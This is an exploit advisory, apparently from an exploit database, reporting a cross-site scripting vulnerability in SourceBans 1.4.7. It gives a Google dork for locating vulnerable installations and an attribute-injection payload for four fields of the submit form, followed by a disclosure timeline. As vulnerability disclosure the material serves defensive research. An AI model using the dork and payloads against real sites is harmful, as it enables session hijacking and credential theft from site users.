# Exploit Title: SourceBans Version 1.4.7XSS# Google Dork: inurl:"sourcebans/index.php?p=submit"# Date: Feb. 9th 2011# Author: Sw1tCh# Software Link: http://www.sourcebans.net/# Version: 1.4.7
Info:
SourceBans is an application for managing publicly the banned users for a Steam Server.#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS)in which an attacker can execute scripts on a client side resulting in a bypass of access controls andor a credentials loss.#-= Example =-
http://<SITE>/sourcebans/index.php?p=submit
-> BanIP =>" onmouseover=prompt(928137) bad="-> Comments =>" onmouseover=prompt(928137) bad="-> Name =>" onmouseover=prompt(928137) bad="-> Email =>" onmouseover=prompt(928137) bad="#Disclosure Information:- Vulnerability found and researched: January 18th 2011- Vendor (SourceBans) contacted: January 18th 2011[ Time Reduced because Ops of IRC channel were dicks ]- Disclosed to Exploit-DB, Bugtraq and InterN0T:#Credits: Sw1tCh#Shoutouts : gen0cide, Scruffy, Griff, D00dl3,
